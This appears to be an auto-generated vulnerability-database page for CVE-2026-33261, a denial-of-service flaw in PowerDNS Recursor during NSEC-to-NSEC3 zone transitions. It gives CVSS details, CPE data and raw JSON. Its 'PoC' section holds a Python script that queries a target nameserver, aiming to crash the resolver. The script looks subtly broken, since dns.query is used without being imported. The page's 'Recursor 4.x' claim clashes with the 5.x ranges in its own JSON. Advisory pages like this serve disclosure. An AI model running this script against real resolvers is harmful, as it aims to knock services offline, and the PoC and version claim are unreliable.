Security Vulnerability Report
中文
CVE-2026-33261 CVSS 5.9 MEDIUM

CVE-2026-33261

Published: 2026-04-22 10:16:52
Last Modified: 2026-04-27 17:03:09

Description

A zone transition from NSEC to NSEC3 might trigger an internal inconsistency and cause a denial of service.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:powerdns:recursor:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:powerdns:recursor:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:powerdns:recursor:5.4.0:*:*:*:*:*:*:* - VULNERABLE
PowerDNS Recursor 4.x (Specific versions affected by advisory 2026-03)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import dns.resolver import dns.message import socket # This script is a conceptual PoC to check for NSEC/NSEC3 handling. # Exploiting CVE-2026-33261 requires the target zone to be in a specific transition state. def check_dnssec_transition(target_domain, nameserver): try: # Query for NSEC record q_nsec = dns.message.make_query(target_domain, 'NSEC') r_nsec = dns.query.udp(q_nsec, nameserver) print(f"[+] NSEC Query response: {r_nsec.flags}") # Query for NSEC3 record q_nsec3 = dns.message.make_query(target_domain, 'NSEC3') r_nsec3 = dns.query.udp(q_nsec3, nameserver) print(f"[+] NSEC3 Query response: {r_nsec3.flags}") print("[!] If the service crashes after these queries against a transitioning zone, it is vulnerable.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and a domain known to be transitioning target_ip = "192.168.1.1" domain = "example.com" check_dnssec_transition(domain, target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33261", "sourceIdentifier": "[email protected]", "published": "2026-04-22T10:16:51.857", "lastModified": "2026-04-27T17:03:09.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A zone transition from NSEC to NSEC3 might trigger an internal inconsistency and cause a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-353"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.2.9", "matchCriteriaId": "EBDA7C62-FAD4-470C-A6FE-4CF19B0BD4AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.0", "versionEndExcluding": "5.3.6", "matchCriteriaId": "9F7AC884-348F-47B1-8853-49BFEDBEA9EA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:powerdns:recursor:5.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4B201BAD-5A74-45E9-91FD-5E950BA18BF3"}]}]}], "references": [{"url": "https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-powerdns-2026-03.html", "source": "[email protected]", "tags": ["Vendor Advisory", "Broken Link"]}]}}